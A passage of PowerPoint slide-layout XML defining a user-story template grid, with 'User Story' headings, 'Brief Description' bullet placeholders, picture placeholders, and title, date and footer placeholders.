          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="142875" lvl="0" indent="-142875">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Brief Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 29">
            <a:extLst>
              <a:ext uri="{052DC3FE-90C9-474B-9C4C-05CD5FDAABB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80C3EF-2C4E-4B48-B483-88FC0A18B5A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357312" y="3752850"/>
            <a:ext cx="1607343" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Story</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{94BCA5F9-FC4D-43E2-977E-34568F0948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A1FE4A-365E-4AA2-B5E6-BE57D715CD2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357312" y="3990975"/>
            <a:ext cx="1607343" cy="607218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="142875" lvl="0" indent="-142875">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Brief Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 29">
            <a:extLst>
              <a:ext uri="{191C963A-9399-4EC3-BE82-22139766D7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2CD6B2-E3FB-4284-AF67-3872A95E9A06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071937" y="2638425"/>
            <a:ext cx="1607343" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Story</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{1B38B4D8-0450-4AB4-9E4F-B4F3098689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B0AF37A-8593-49B6-BC47-6D2D78396E63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071937" y="2886075"/>
            <a:ext cx="1607343" cy="607218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="142875" lvl="0" indent="-142875">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Brief Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 29">
            <a:extLst>
              <a:ext uri="{DF186B0F-CDD6-4D96-8A1B-F194938937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912CF9C-9F90-4920-A595-2FC8A41C51ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071937" y="1543050"/>
            <a:ext cx="1607343" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Story</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{C616278D-D089-4BBB-B452-27C031D8146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2AF501-17DA-4163-9EE4-01A3043B0515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071937" y="1781175"/>
            <a:ext cx="1607343" cy="607218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="142875" lvl="0" indent="-142875">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Brief Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 29">
            <a:extLst>
              <a:ext uri="{4E44A193-A5EB-40F9-88B0-89D1628352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2509D5E-A14D-4CB1-827D-C9F84A968CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071937" y="3752850"/>
            <a:ext cx="1607343" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Story</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{320A2B20-4D63-4EFE-A01A-71B799608E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03204D-8479-488B-A415-FA533AC640F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071937" y="3990975"/>
            <a:ext cx="1607343" cy="607218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="142875" lvl="0" indent="-142875">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Brief Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 29">
            <a:extLst>
              <a:ext uri="{2B1C6244-6B3E-46BA-9F80-33F20A81AD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7AA2392-E507-4FEF-A01C-7931417E4D32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786562" y="2638425"/>
            <a:ext cx="1607343" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Story</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{A57D18AC-82C8-4E66-9E92-F8512F31E97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DECE69-29FF-426F-BA67-54CB283E3041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786562" y="2886075"/>
            <a:ext cx="1607343" cy="607218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="142875" lvl="0" indent="-142875">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Brief Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 29">
            <a:extLst>
              <a:ext uri="{04E8ACCD-1FE4-498E-A881-A17DF3DA31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E361CE-28D5-45C6-B4EB-0F0107FC8520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786562" y="1543050"/>
            <a:ext cx="1607343" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Story</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{2A942F10-83BD-4F73-8F99-34DBA6CEDC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04E35A-5531-4664-94F1-C3B8C4193E8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786562" y="1781175"/>
            <a:ext cx="1607343" cy="607218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="142875" lvl="0" indent="-142875">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Brief Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Placeholder 29">
            <a:extLst>
              <a:ext uri="{B05BA4AF-8A91-472A-91D5-B6D9279F3D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CF938C-CB4A-49E5-A326-32E170C2539D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786562" y="3752850"/>
            <a:ext cx="1607343" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Story</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{0CA47E87-12B6-4CD1-9A37-990AD6AE5E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02B225-9B2C-4643-86F5-34D453064308}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786562" y="3990975"/>
            <a:ext cx="1607343" cy="607218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="142875" lvl="0" indent="-142875">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Brief Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Picture Placeholder 23">
            <a:extLst>
              <a:ext uri="{5644632E-A836-4E29-A6E4-3364A8A58D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471FB2-9098-4083-A593-74CA8722B63A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550068" y="1550193"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Picture Placeholder 24">
            <a:extLst>
              <a:ext uri="{6DDDB1E8-CAE9-4B66-8742-48986C705C1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C3C754-BAB1-4CDC-AD09-A9B773E34768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550068" y="2621756"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Picture Placeholder 25">
            <a:extLst>
              <a:ext uri="{9675A6FB-F785-48AE-9E29-1A21E1C3DAA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7CBC26-CE9B-416C-BCD1-C56A3B895432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550068" y="3729037"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Picture Placeholder 26">
            <a:extLst>
              <a:ext uri="{C64D1137-55CF-412A-9DDE-E99D124451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CBE195-0410-478D-90D8-7D570772E532}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286125" y="1550193"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Picture Placeholder 27">
            <a:extLst>
              <a:ext uri="{42014720-34D2-4144-B8F0-8616C87BDD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71759B-DD32-40F8-8B90-4DE7B60944D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286125" y="2621756"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Picture Placeholder 28">
            <a:extLst>
              <a:ext uri="{DAF2CF70-F6B9-463C-8531-532619F1B2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F3E7E3-D4D6-40E6-8B05-4C4B3247FD6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286125" y="3729037"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Picture Placeholder 29">
            <a:extLst>
              <a:ext uri="{851BFBD7-4692-4422-BDBC-E96D79DD7D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731717-EB9B-45EC-9DB7-AB38C05CF06F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000750" y="1550193"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Picture Placeholder 30">
            <a:extLst>
              <a:ext uri="{4D908DF8-FBF9-4895-B14C-5053AC6D48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0CA9A45-CE23-431F-B5A2-F33332D083F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000750" y="2621756"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Picture Placeholder 31">
            <a:extLst>
              <a:ext uri="{E31803B7-4FF7-4DC7-A006-87DABA4C3B7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61EDDD-943D-4327-B751-65111E9CA79D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="29"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000750" y="3729037"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{BA844F9F-C002-465F-AE27-DF83DE1836F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EE7F4EF-B49B-4DCA-8AD6-AD002050812F}"/>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4" name="Title 33">
            <a:extLst>
              <a:ext uri="{C0D6092C-7BB9-4976-BF5D-7D708D294F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32EC5C-6272-4CB0-B6CE-05A2FECA086F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="30"/>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35" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{AE189EEB-4E63-4ACB-96C0-BFA285145B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59BC378-1FA5-41EB-8B49-2FAB54BEC7C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="31"/>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42748B62-1EAD-4A8E-8791-96CB8A9BB397}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{0265666D-9AFC-460D-BCC0-45A66D4C80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5DF9E3-4A4F-4E0D-A6D9-4FC978EA4A42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="32"/>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extLst>
